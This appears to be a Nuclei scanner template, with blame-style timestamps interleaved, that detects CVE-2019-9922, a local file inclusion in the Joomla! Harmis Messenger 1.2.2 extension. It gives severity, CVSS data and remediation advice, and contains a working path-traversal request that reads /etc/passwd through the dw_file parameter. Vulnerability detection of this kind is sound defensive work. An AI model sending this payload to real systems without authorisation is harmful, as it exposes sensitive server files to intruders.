2022-07-10 22:31:44 +00:00
id : CVE-2019-9922
2022-07-26 13:45:11 +00:00
2022-07-10 22:31:44 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Joomla! Harmis Messenger 1.2.2 - Local File Inclusion
2022-07-10 22:31:44 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application.
2023-09-06 12:53:28 +00:00
remediation : |
Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability.
2022-07-10 22:31:44 +00:00
reference :
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
2022-07-11 15:41:17 +00:00
- https://extensions.joomla.org/extension/je-messenger/
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-9922
2022-07-10 22:31:44 +00:00
classification :
2023-02-01 20:14:44 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-07-10 22:31:44 +00:00
cvss-score : 7.5
cve-id : CVE-2019-9922
cwe-id : CWE-22
2023-11-27 09:19:41 +00:00
epss-score : 0.01171
2024-01-14 13:49:27 +00:00
epss-percentile : 0.83428
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : harmistechnology
product : je_messenger
2023-09-06 12:53:28 +00:00
framework : joomla\!
2024-01-14 09:21:50 +00:00
tags : cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\!
2022-07-10 22:31:44 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-10 22:31:44 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a004730450220276966fa3dd3a21b689a194a66c2e26334b919702ea71f91580f271b80522b5002210095e182dbaa3da414e60088587ce727a2609eb63fd7650e93d5897dfb768c4211:922c64590222798bb761d5b6d8e72950